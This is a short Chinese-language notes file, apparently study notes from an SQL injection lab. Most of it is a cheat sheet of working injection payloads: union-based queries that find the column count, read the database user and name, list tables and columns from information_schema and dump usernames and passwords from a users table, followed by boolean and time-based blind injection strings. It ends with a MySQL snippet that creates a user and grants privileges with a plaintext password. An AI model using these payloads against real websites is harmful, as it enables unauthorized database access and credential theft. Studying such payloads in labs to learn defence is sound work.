sql注入记录

order by确定列数

id = 1' order by 5 --+

union确定匹配的列

id=0' union select 1,2,3 --+

获取相应的用户名和数据库名

id=0' union select 1,user(),database() --+

group_contact()函数

GROUP_CONCAT(expr)该函数将非空列值按照分组条件进行合并并最终返回。如果有空值，则返回为空

id=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() --+


id=0' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+

id=0' union select id,group_concat(username,','),group_concat(password,',') from users --+

2. 盲注

2.1 布尔盲注获取长度

id=1' and length(database())=8 --+

2.2 时间盲注获取库名

substr(database(),1,1)```

' and if(1=0,1,sleep(10)) --+

?id=1' and if(ascii(substr(database(),1,1))=116,sleep(6),1) -

数据库安全

CREATE USER 'orcl'@'localhost' IDENTIFIED BY 'orcl12345678';

grant select,insert,update,delete on man_sys.* to orcl@'localhost' identified by 'orcl12345678';